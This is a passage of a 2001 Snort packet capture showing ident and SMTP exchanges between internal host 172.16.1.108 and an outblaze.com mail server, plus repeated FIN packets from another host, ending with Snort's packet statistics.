0xB6EA921B Ack: 0xB69ABF04 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 3028831 14596022 31 30 32 39 20 2C 20 32 35 20 3A 20 55 53 45 52 1029 , 25 : USER 49 44 20 3A 20 4F 54 48 45 52 20 3A 72 6F 6F 74 ID : OTHER :root 0D 0A .. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:24.615508 209.61.188.33:43497 -> 172.16.1.108:113 TCP TTL:49 TOS:0x0 ID:0 IpLen:20 DgmLen:52 DF ***A***F Seq: 0xB69ABF04 Ack: 0xB6EA923D Win: 0x16D0 TcpLen: 32 TCP Options (3) => NOP NOP TS: 14596031 3028831 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:24.616733 172.16.1.108:113 -> 209.61.188.33:43497 TCP TTL:63 TOS:0x0 ID:450 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xB6EA923D Ack: 0xB69ABF05 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 3028839 14596031 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:24.617103 172.16.1.108:113 -> 209.61.188.33:43497 TCP TTL:63 TOS:0x0 ID:451 IpLen:20 DgmLen:52 DF ***A***F Seq: 0xB6EA923D Ack: 0xB69ABF05 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 3028839 14596031 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:24.697187 209.61.188.33:43497 -> 172.16.1.108:113 TCP TTL:237 TOS:0x0 ID:0 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xB69ABF05 Ack: 0xB6EA923E Win: 0x16D0 TcpLen: 32 TCP Options (3) => NOP NOP TS: 14596039 3028839 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:24.850591 209.61.188.33:25 -> 172.16.1.108:1029 TCP TTL:49 TOS:0x0 ID:0 IpLen:20 DgmLen:139 DF ***AP*** Seq: 0xB6BBA1E2 Ack: 0xB679C13D Win: 0x16A0 TcpLen: 32 TCP Options (3) => NOP NOP TS: 14596053 3028765 32 32 30 20 73 70 66 32 2E 75 73 33 2E 6F 75 74 220 spf2.us3.out 62 6C 61 7A 65 2E 63 6F 6D 20 45 53 4D 54 50 20 blaze.com ESMTP 53 65 6E 64 6D 61 69 6C 20 38 2E 31 31 2E 32 2F Sendmail 8.11.2/ 38 2E 31 31 2E 32 3B 20 46 72 69 2C 20 31 36 20 8.11.2; Fri, 16 4D 61 72 20 32 30 30 31 20 30 31 3A 34 36 3A 32 Mar 2001 01:46:2 34 20 47 4D 54 0D 0A 4 GMT.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:24.852031 172.16.1.108:1029 -> 209.61.188.33:25 TCP TTL:63 TOS:0x0 ID:452 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xB679C13D Ack: 0xB6BBA239 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 3028862 14596053 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:24.852556 172.16.1.108:1029 -> 209.61.188.33:25 TCP TTL:63 TOS:0x0 ID:453 IpLen:20 DgmLen:64 DF ***AP*** Seq: 0xB679C13D Ack: 0xB6BBA239 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 3028862 14596053 45 48 4C 4F 20 61 73 64 66 31 0D 0A EHLO asdf1.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:24.940729 209.61.188.33:25 -> 172.16.1.108:1029 TCP TTL:49 TOS:0x0 ID:0 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xB6BBA239 Ack: 0xB679C149 Win: 0x16A0 TcpLen: 32 TCP Options (3) => NOP NOP TS: 14596062 3028862 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:24.966714 209.61.188.33:25 -> 172.16.1.108:1029 TCP TTL:49 TOS:0x0 ID:0 IpLen:20 DgmLen:288 DF ***AP*** Seq: 0xB6BBA239 Ack: 0xB679C149 Win: 0x16A0 TcpLen: 32 TCP Options (3) => NOP NOP TS: 14596062 3028862 32 35 30 2D 73 70 66 32 2E 75 73 33 2E 6F 75 74 250-spf2.us3.out 62 6C 61 7A 65 2E 63 6F 6D 20 48 65 6C 6C 6F 20 blaze.com Hello 49 44 45 4E 54 3A 72 6F 6F 74 40 61 73 64 66 31 IDENT:root@asdf1 2E 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 .xxxxxxxxxxxxxxx 78 78 78 2E 78 78 78 20 5B 31 37 32 2E 31 36 2E xxx.xxx [172.16. 31 2E 31 30 38 5D 2C 20 70 6C 65 61 73 65 64 20 1.108], pleased 74 6F 20 6D 65 65 74 20 79 6F 75 0D 0A 32 35 30 to meet you..250 2D 45 4E 48 41 4E 43 45 44 53 54 41 54 55 53 43 -ENHANCEDSTATUSC 4F 44 45 53 0D 0A 32 35 30 2D 45 58 50 4E 0D 0A ODES..250-EXPN.. 32 35 30 2D 56 45 52 42 0D 0A 32 35 30 2D 38 42 250-VERB..250-8B 49 54 4D 49 4D 45 0D 0A 32 35 30 2D 53 49 5A 45 ITMIME..250-SIZE 20 31 30 30 30 30 30 30 30 0D 0A 32 35 30 2D 44 10000000..250-D 53 4E 0D 0A 32 35 30 2D 4F 4E 45 58 0D 0A 32 35 SN..250-ONEX..25 30 2D 45 54 52 4E 0D 0A 32 35 30 2D 58 55 53 52 0-ETRN..250-XUSR 0D 0A 32 35 30 20 48 45 4C 50 0D 0A ..250 HELP.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:24.969207 172.16.1.108:1029 -> 209.61.188.33:25 TCP TTL:63 TOS:0x0 ID:454 IpLen:20 DgmLen:85 DF ***AP*** Seq: 0xB679C149 Ack: 0xB6BBA325 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 3028874 14596062 4D 41 49 4C 20 46 72 6F 6D 3A 3C 72 6F 6F 74 40 MAIL From: SIZE=838. 0A . =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:25.101330 209.61.188.33:25 -> 172.16.1.108:1029 TCP TTL:49 TOS:0x0 ID:0 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xB6BBA325 Ack: 0xB679C16A Win: 0x16A0 TcpLen: 32 TCP Options (3) => NOP NOP TS: 14596079 3028874 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:25.229954 209.61.188.33:25 -> 172.16.1.108:1029 TCP TTL:49 TOS:0x0 ID:0 IpLen:20 DgmLen:130 DF ***AP*** Seq: 0xB6BBA325 Ack: 0xB679C16A Win: 0x16A0 TcpLen: 32 TCP Options (3) => NOP NOP TS: 14596091 3028874 35 30 31 20 35 2E 31 2E 38 20 3C 72 6F 6F 74 40 501 5.1.8 ... Domain 20 6F 66 20 73 65 6E 64 65 72 20 61 64 64 72 65 of sender addre 73 73 20 72 6F 6F 74 40 61 73 64 66 31 20 64 6F ss root@asdf1 do 65 73 20 6E 6F 74 20 65 78 69 73 74 0D 0A es not exist.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:25.243377 172.16.1.108:1029 -> 209.61.188.33:25 TCP TTL:63 TOS:0x0 ID:457 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xB679C16A Ack: 0xB6BBA373 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 3028902 14596091 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:25.435892 172.16.1.108:1029 -> 209.61.188.33:25 TCP TTL:63 TOS:0x0 ID:461 IpLen:20 DgmLen:58 DF ***AP*** Seq: 0xB679C16A Ack: 0xB6BBA373 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 3028921 14596091 51 55 49 54 0D 0A QUIT.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:25.522962 209.61.188.33:25 -> 172.16.1.108:1029 TCP TTL:49 TOS:0x0 ID:0 IpLen:20 DgmLen:104 DF ***AP*** Seq: 0xB6BBA373 Ack: 0xB679C170 Win: 0x16A0 TcpLen: 32 TCP Options (3) => NOP NOP TS: 14596121 3028921 32 32 31 20 32 2E 30 2E 30 20 73 70 66 32 2E 75 221 2.0.0 spf2.u 73 33 2E 6F 75 74 62 6C 61 7A 65 2E 63 6F 6D 20 s3.outblaze.com 63 6C 6F 73 69 6E 67 20 63 6F 6E 6E 65 63 74 69 closing connecti 6F 6E 0D 0A on.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:25.524172 209.61.188.33:25 -> 172.16.1.108:1029 TCP TTL:49 TOS:0x0 ID:0 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xB6BBA373 Ack: 0xB679C170 Win: 0x16A0 TcpLen: 32 TCP Options (3) => NOP NOP TS: 14596121 3028921 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:25.524564 172.16.1.108:1029 -> 209.61.188.33:25 TCP TTL:63 TOS:0x0 ID:462 IpLen:20 DgmLen:52 DF ***A***F Seq: 0xB679C170 Ack: 0xB6BBA3A7 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 3028930 14596121 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:25.525643 172.16.1.108:1029 -> 209.61.188.33:25 TCP TTL:63 TOS:0x0 ID:463 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xB679C171 Ack: 0xB6BBA3A7 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 3028930 14596121 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:25.532146 209.61.188.33:25 -> 172.16.1.108:1029 TCP TTL:49 TOS:0x0 ID:0 IpLen:20 DgmLen:52 DF ***A***F Seq: 0xB6BBA3A7 Ack: 0xB679C170 Win: 0x16A0 TcpLen: 32 TCP Options (3) => NOP NOP TS: 14596121 3028921 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:25.533477 172.16.1.108:1029 -> 209.61.188.33:25 TCP TTL:63 TOS:0x0 ID:464 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xB679C171 Ack: 0xB6BBA3A8 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 3028931 14596121 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:46:25.605498 209.61.188.33:25 -> 172.16.1.108:1029 TCP TTL:49 TOS:0x0 ID:0 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xB6BBA3A8 Ack: 0xB679C171 Win: 0x16A0 TcpLen: 32 TCP Options (3) => NOP NOP TS: 14596129 3028930 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:47:28.507225 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:43934 IpLen:20 DgmLen:52 DF ***A***F Seq: 0x9C6D2C68 Ack: 0x59606B4A Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23835075 3021853 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:49:28.507383 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:15898 IpLen:20 DgmLen:52 DF ***A***F Seq: 0x9C6D2C68 Ack: 0x59606B4A Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23847075 3021853 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:51:28.505944 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:22674 IpLen:20 DgmLen:52 DF ***A***F Seq: 0x9C6D2C68 Ack: 0x59606B4A Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23859075 3021853 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:53:28.508847 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:23477 IpLen:20 DgmLen:52 DF ***A***F Seq: 0x9C6D2C68 Ack: 0x59606B4A Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23871075 3021853 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:55:28.504835 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:34536 IpLen:20 DgmLen:52 DF ***A***F Seq: 0x9C6D2C68 Ack: 0x59606B4A Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23883075 3021853 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:57:28.505757 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:12686 IpLen:20 DgmLen:52 DF ***A***F Seq: 0x9C6D2C68 Ack: 0x59606B4A Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23895075 3021853 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:59:28.504290 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:21520 IpLen:20 DgmLen:52 DF ***A***F Seq: 0x9C6D2C68 Ack: 0x59606B4A Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23907075 3021853 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-21:01:28.491741 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:23985 IpLen:20 DgmLen:52 DF ***A***F Seq: 0x9C6D2C68 Ack: 0x59606B4A Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23919075 3021853 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-21:03:28.494908 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:24733 IpLen:20 DgmLen:52 DF ***A***F Seq: 0x9C6D2C68 Ack: 0x59606B4A Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23931075 3021853 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ =============================================================================== Snort processed 239 packets. Breakdown by protocol: Action Stats: TCP: 234 (97.908%) ALERTS: 0 UDP: 5 (2.092%) LOGGED: 0 ICMP: 0 (0.000%) PASSED: 0 ARP: 0 (0.000%) IPv6: 0 (0.000%) IPX: 0 (0.000%) OTHER: 0 (0.000%) =============================================================================== Fragmentation Stats: Fragmented IP Packets: 0 (0.000%) Rebuilt IP Packets: 0 Frag elements used: 0 Discarded(incomplete): 0 Discarded(timeout): 0 =============================================================================== TCP Stream Reassembly Stats: TCP Packets Used: 0 (0.000%) Reconstructed Packets: 0 (0.000%) Streams Reconstructed: 0 ===============================================================================